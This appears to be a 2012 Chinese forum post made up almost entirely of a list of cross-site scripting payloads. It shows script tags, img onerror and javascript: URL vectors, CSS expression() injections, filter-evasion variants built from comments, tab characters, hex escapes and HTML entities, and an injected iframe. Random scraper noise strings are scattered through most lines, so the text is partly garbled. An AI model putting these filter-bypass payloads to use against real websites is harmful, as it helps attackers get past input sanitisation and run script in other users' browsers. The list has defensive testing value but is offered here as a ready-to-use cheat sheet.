<script>alert("跨站")</script> (最常用)
g; h! ]6 h& Z: c& o1 y<img scr=javascript:alert("跨站")></img>% z7 L. B# y$ D% N
<img scr="javascript: alert(/跨站/)></img>/ L( h9 S* h; t
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)# d% |3 S6 r6 z. ?
<img scr="#" onerror=alert(/跨站/)></img>( _% X; p5 D+ H- P; Y0 C
<img scr="#" style="xss:expression(alert(/xss/));"></img>
4 V# v& Z: C( |$ b<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)* C, {; Q6 s$ K- F0 v
<img src=vbscript:msgbox ("xss")></img>, {. C" v/ M9 k2 @1 M/ _+ l( v
<style> input {left:expression (alert('xss'))}</style>- |+ r" g1 z1 S3 B6 {
<div style={left:expression (alert('xss'))}></div>2 z( y0 q1 r5 R# T) a# {
<div style={left:exp/* */ression (alert('xss'))}></div># E9 P- r( C \2 {# L% x; p9 O
<div style={left:\0065\0078ression (alert('xss'))}></div>. R0 w) J8 k( w% @% F7 p
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 u3 R* y) N& B9 l$ a* k( U4 V
unicode <div style="{left:expRessioN (alert('xss'))}">
) \0 O8 l- @5 u0 h) S! e4 ~. `! r B# h
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["( J5 X& \& c& V; E
|
发表于 2012-9-13 17:15:04
收藏
支持
反对